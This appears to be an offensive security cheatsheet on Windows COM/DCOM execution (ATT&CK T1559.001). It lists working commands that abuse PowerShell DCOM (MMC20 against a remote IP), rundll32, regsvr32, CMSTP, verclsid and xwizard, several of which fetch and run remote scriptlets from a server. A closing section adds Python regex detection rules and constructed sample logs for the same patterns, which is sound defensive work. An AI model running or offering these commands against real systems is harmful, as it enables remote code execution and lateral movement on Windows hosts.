# COM Execution - T1559.001

Windows Component Object Model (COM) quick execution cheatsheet

## PowerShell

Using PowerShell with .NET type syntax to quickly create a COM or DCOM instance from either a CLSID or a ProgID.

### Execution via CLSID

```powershell
$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
```

### Execution via ProgID

```powershell
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
```

### DCOM Execution

Distributed COM (DCOM) extends COM so that, among other things, COM objects can be instantiated and invoked on a remote host. Note that DCOM can also be used **locally** by specifying the loopback address (127.0.0.1).

```powershell
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")
```

## Rundll32

### Execution via CLSID

```powershell
Rundll32.exe -sta {GUID}
```

### Execution via ProgID

```powershell
Rundll32.exe -sta Scripting.Dictionary
```

### Execution via shell32.dll

```powershell
# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}
```

### Scriptlet Execution from Remote Server

```powershell
# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://127.0.0.1:8080/calc.sct").Exec();
```

### Remote Scriptlet via INF file

```
# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1
```

## Regsvr32

### COM Local Scriptlet Execution

```
# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct
```

### COM Scriptlet Execution from Remote Server

```
# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll
```

## CMSTP

Execution via an INF file that downloads and executes a scriptlet (.sct).

```ini
; INF file
; Running a scriptlet via CMSTP.exe (INF pointing at an .sct file)
[version]
Signature=$Chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"
```

```
cmstp.exe /su test.inf
```

{% hint style="info" %}
Credit to @Amr\_Thabet for the INF code
{% endhint %}

## Verclsid

### Execution via CLSID

```
verclsid.exe /S /C {CLSID}
```

## Xwizard

### Execution via CLSID

```
xwizard.exe RunWizard /taero /u {CLSID}
```
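## Detection

Detection logic for the command lines catalogued above, as an added example that is not part of the original cheatsheet: regex rules run over constructed Sysmon-style process-creation records. The `RecordId`/`CommandLine` dict shape, the rule names and all sample lines are assumptions made for this example.

```python
import re

# Detection rules for the COM / DCOM proxy-execution command lines catalogued on this page.
# Each rule is (name, regex) and is tested against a process-creation command line.
COM_EXEC_RULES = [
    ("regsvr32_scriptlet",  re.compile(r"\bregsvr32(?:\.exe)?\b.*(?:/i:\S+\.sct|scrobj\.dll)", re.I)),
    ("regsvr32_remote_sct", re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:https?://", re.I)),
    ("rundll32_javascript", re.compile(r"\brundll32(?:\.exe)?\s+javascript:", re.I)),
    ("rundll32_launch_inf", re.compile(r"\brundll32(?:\.exe)?\b.*advpack\.dll\s*,\s*LaunchINFSection", re.I)),
    ("rundll32_com_server", re.compile(r"\brundll32(?:\.exe)?\b.*(?:SHCreateLocalServerRunDll|\s-sta\b)", re.I)),
    ("cmstp_inf_install",   re.compile(r"\bcmstp(?:\.exe)?\b.*\.inf\b", re.I)),
    ("verclsid_clsid",      re.compile(r"\bverclsid(?:\.exe)?\b.*/C\s*\{", re.I)),
    ("xwizard_runwizard",   re.compile(r"\bxwizard(?:\.exe)?\s+RunWizard\b.*/u", re.I)),
    ("ps_com_activate",     re.compile(r"Activator\]::CreateInstance\(.*GetTypeFrom(?:CLSID|ProgID)", re.I)),
    # A second argument to GetTypeFromCLSID/GetTypeFromProgID is the remote server: DCOM activation.
    ("ps_dcom_activate",    re.compile(r"GetTypeFrom(?:CLSID|ProgID)\s*\([^)]*,[^)]*\)", re.I)),
]


def match_com_execution(cmdline: str) -> list[str]:
    """Return the names of all rules the command line triggers (empty list when nothing fires)."""
    return [name for name, rx in COM_EXEC_RULES if rx.search(cmdline)]


def scan_process_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run the rules over process-creation records (Sysmon Event ID 1 style dicts with
    'RecordId' and 'CommandLine'); return (RecordId, hit names) for each record that fires."""
    results = []
    for ev in events:
        hits = match_com_execution(ev["CommandLine"])
        if hits:
            results.append((ev["RecordId"], hits))
    return results


# Constructed sample telemetry (not real captures): two benign lines, then the page's patterns.
SAMPLE_EVENTS = [
    {"RecordId": 1, "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"RecordId": 2, "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"RecordId": 3, "CommandLine": r"regsvr32 /s /n /u /i:http://127.0.0.1:8080/test.sct C:\Windows\system32\scrobj.dll"},
    {"RecordId": 4, "CommandLine": r"rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1"},
    {"RecordId": 5, "CommandLine": r"cmstp.exe /su test.inf"},
    {"RecordId": 6, "CommandLine": r"xwizard.exe RunWizard /taero /u {CLSID}"},
    {"RecordId": 7, "CommandLine": 'powershell -c "$a=[System.Activator]::CreateInstance([type]::GetTypeFromProgID(\'MMC20.Application.1\',\'10.0.0.2\'))"'},
]

if __name__ == "__main__":
    for record_id, hits in scan_process_events(SAMPLE_EVENTS):
        print(f"record {record_id}: {', '.join(hits)}")
```

The rules key on the proxy binary plus the argument that makes it a scriptlet or COM-server launch, so ordinary `regsvr32 /s` registrations and Control Panel `rundll32` calls stay quiet.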

## ATT&CK Techniques on this Page

* Command and Scripting Interpreter: PowerShell - T1059.001
* Inter-Process Communication: Component Object Model - T1559.001
* System Binary Proxy Execution: CMSTP - T1218.003
* System Binary Proxy Execution: Rundll32 - T1218.011
* System Binary Proxy Execution: Verclsid - T1218.012
* System Binary Proxy Execution: Regsvr32 - T1218.010
